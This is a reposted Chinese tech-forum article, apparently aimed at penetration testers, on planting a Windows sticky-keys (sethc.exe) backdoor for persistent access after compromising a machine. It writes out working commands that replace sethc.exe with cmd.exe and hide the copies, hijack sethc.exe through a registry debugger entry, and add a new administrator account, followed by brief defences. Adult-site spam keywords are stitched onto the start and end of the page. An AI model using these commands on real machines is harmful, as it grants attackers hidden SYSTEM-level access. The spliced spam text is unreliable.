在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

Windows Shift后門利用

jf_hKIAo4na ? 來源:Mi1k7ea ? 2023-01-30 10:38 ? 次閱讀

0x00 前言

通常,在內網滲透打下一臺機子之后,可以給這臺機子留個Shift后門。

0x01 Shift后門利用

簡介

粘滯鍵漏洞,在Windows系統下連續按5下SHIFT鍵,可以啟動系統的粘滯鍵功能,其進程名為Sethc.exe,應用程序在Windowssystem32下。

黑客用其它應用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當再次連續按5次SHIFT鍵,就會啟動黑客替換的應用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠程計算機時,在用戶登錄界面,連續按5下SHIFT就可以啟動該漏洞,進而控制遠程計算機。

漏洞原理

在Windows系統登錄界面狀態下,粘滯鍵仍可以以連續按5下SHIFT鍵運行,并且此時應用程序會以WINDOWS的最高權限-SYSTEM權限運行,所以計算機一旦被安裝該后門,入侵者便可悄無聲息地遠程操縱計算機。

漏洞利用

大致思路如下:

拿到目標主機權限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;

其中,命令行方式為:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要將dllcache文件夾中的緩存刪掉,否則會自動復原回去。

注冊表方式為:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說明:reg add是向注冊表添加記錄,后面跟的是注冊表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過/ v來指定鍵名,其中鍵名debugger是固定的,然后通過/ t來指定REG_SZ字符串類型,最后通過/ d來指定鍵的值,即被惡意替換的程序cmd.exe。

這樣,在下次遠程連接目標主機登錄的時候就可以連續5下SHIFT觸發cmd.exe;

可以輸入explorer.exe調出程序管理系統方便操作;

當然,上面的方法存在缺陷,就是可能會導致遠程連接無法持久進行,因此可以直接添加新用戶便于下次直接登錄:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統盤為NTFS文件系統,可以將sytem32下的sethc.exe文件設為everyone拒絕訪問;

直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。;

通過注冊表設置實現防御;

審核編輯 :李倩

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • WINDOWS
    +關注

    關注

    4

    文章

    3552

    瀏覽量

    88821
  • 應用程序
    +關注

    關注

    37

    文章

    3277

    瀏覽量

    57738
  • Shift
    +關注

    關注

    0

    文章

    5

    瀏覽量

    7473

原文標題:Windows Shift后門利用

文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    2024 Commvault SHIFT全球巡演中國站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中國站完美收官。大會匯聚數據安全和管理領域的知名專家、業務掌舵人和生態伙伴,聚焦混合云趨勢下的數據保護需求變革,探討企業如何借助創新平臺驅動全新范式,成就持續業務的競爭優勢,呈現了一場思想和技術的盛宴。
    的頭像 發表于 12-10 16:44 ?429次閱讀

    Windows 10將于2025年終止免費更新,微軟力推Windows 11

    近日,微軟在其官方網站上發布了一則通知,宣布自2025年10月14日起,將正式停止為Windows 10操作系統提供來自Windows更新的免費軟件更新、技術支持以及安全修復程序。這一決定意味著
    的頭像 發表于 11-05 10:35 ?419次閱讀

    Commvault SHIFT全球線上大會圓滿落幕

    近日,Commvault SHIFT全球線上大會圓滿落幕。大會上,Commvault發布了一系列面向持續業務的平臺新功能,并攜手行業專家暢談云優先時代的彈性趨勢。Commvault總裁兼首席執行官
    的頭像 發表于 10-21 11:32 ?397次閱讀

    華納云:ChatGPT 登陸 Windows

    ChatGPT 現已在 Windows 上推出。 今天,OpenAI宣布已開始預覽其 AI 聊天機器人平臺ChatGPT的專用 Windows 應用程序。 OpenAI 表示, ChatGPT
    的頭像 發表于 10-18 15:50 ?246次閱讀

    Windows管理內存的三種主要方式

    Windows操作系統提供了多種方式來管理內存,以確保系統資源的有效利用和性能的優化。以下是關于Windows管理內存的三種主要方式的詳細闡述,包括堆內存管理、虛擬內存管理以及共享內存管理,每種方式都將從概念、原理、運作機制和應
    的頭像 發表于 10-12 17:09 ?859次閱讀

    Credo發布HiWire SHIFT AEC新品

    該新系列SHIFT AEC產品是基于Credo先進的800G HiWire AEC設計優化而來,能效卓越,性能更佳,且具有極致的可靠性
    的頭像 發表于 09-12 14:07 ?325次閱讀

    windows11 遠程連接工具

    隨著遠程辦公的普及,選擇合適的遠程桌面工具變得尤為重要。在Windows11上,用戶可以利用系統自帶的遠程桌面功能,或選擇更專業的第三方解決方案,如Splashtop。本文將詳細介紹如何在
    的頭像 發表于 08-06 08:37 ?374次閱讀
    <b class='flag-5'>windows</b>11 遠程連接工具

    針對Windows系統和macOS系統的全局代理修改方法

    WINDOWS
    jf_62215197
    發布于 :2024年07月16日 07:30:54

    后門!ASML可遠程鎖光刻機!

    與ASML進行光刻機問題溝通時,負責人做出了保證,他們有能力遠程鎖控芯片制造設備。 這就意味著ASML傳承了歐美企業留有“后門”的習慣,而伴隨著這樣一則信息的揭露,或許很有可能會被美國所利用,徹底走向不可控的局面,而ASML絲毫不加以掩飾,這其中很可能存
    的頭像 發表于 05-24 09:35 ?583次閱讀

    微軟確認Windows 10和Windows Server 2019更新5月版時出現0x錯誤

    近期,微軟更新Windows健康控制臺,公開承認其針對Windows 10系統于5月份推出的更新(即KB5037765)與Windows Server 2019面臨同樣的問題——安裝過程中可能出現0x800f0982錯誤。
    的頭像 發表于 05-17 11:10 ?607次閱讀

    Windows 11 22H2新版任務管理器新增啟用隱藏功能

    關于如何隱藏調用舊版任務管理器,網友 @thebookisclosed 分享了詳細步驟。他指出,在現有 Windows 11 環境中,即使按 Ctrl+Shift+Esc 組合鍵也難以調出老版本的任務管理器,需通過特定路徑“C:\Win
    的頭像 發表于 03-27 15:08 ?499次閱讀

    趨勢科技報告揭示黑客利用Windows Defender SmartScreen漏洞進行惡意軟件分發

    這起事故被編號為CVE-2024-21412,出現在Windows Defender SmartScreen之中的一項漏洞,攻擊者透過生成特定文件,輕易繞開微軟系統的嚴密安全審查。
    的頭像 發表于 03-14 09:48 ?462次閱讀

    WINDOWS系統有幾個版本

    Windows系統自1985年發布以來,已經推出了多個版本。根據不同的分類方式,Windows系統的版本可以分為以下幾類: 按照時間順序。包括Windows 1.0、Windows 2
    發表于 02-29 16:40

    Commvault SHIFT大會·中國站圓滿落幕

    1月18日,Commvault SHIFT 大會 · 中國站圓滿落幕!本次大會以“驅動網絡彈性新轉變”為主題,Commvault攜手行業專家,通過主題演講、客座分享、觀點碰撞等形式,為參會者帶來網絡彈性前沿趨勢、創新方法和最佳實踐的精彩分享!
    的頭像 發表于 01-23 14:46 ?973次閱讀

    傳音Infinix在CES 2024上推出最新突破性技術E-Color Shift

    近日,傳音旗下品牌Infinix在CES 2024上推出最新突破性技術E-Color Shift,可以使手機背面面板在不消耗電力的情況下改變并保持鮮艷的顏色。
    的頭像 發表于 01-23 11:39 ?1172次閱讀
    主站蜘蛛池模板: 2022欧美高清中文字幕在线看| 日日夜夜噜| 天天干天天拍天天操| 精品成人网| 色综合久久综合欧美综合网| 久久精品国产精品亚洲人人| 全亚洲最大的777io影院| 天天干天天射天天操| 色综合天天综合网亚洲影院| 免费观看午夜在线欧差毛片| www.色午夜.com| 天天综合天天做| a站在线观看| 天天弄天天干| 波多野结衣的毛片| avtt香蕉| xx日本69| 99热最新在线观看| 99亚洲精品卡2卡三卡4卡2卡| 性午夜影院| 在线你懂的网址| 久久99热精品| 亚洲激情| 人与牲动交bbbbxxxx| 四虎8848精品永久在线观看| 永久免费看mv网站入口| 欧美另类亚洲一区二区| 一级一片免费视频播放| 日本在线观看成人小视频| 色婷婷777| 黄网站色视频| 天天激情| 丁香五月缴情综合网| 91啦视频在线| 亚洲三级网| 美女国产一区| 黄 色美 女人| 天天视频在线观看免费| 免费视频网站在线看视频| 黄色三级欧美| 亚洲一级毛片免观看|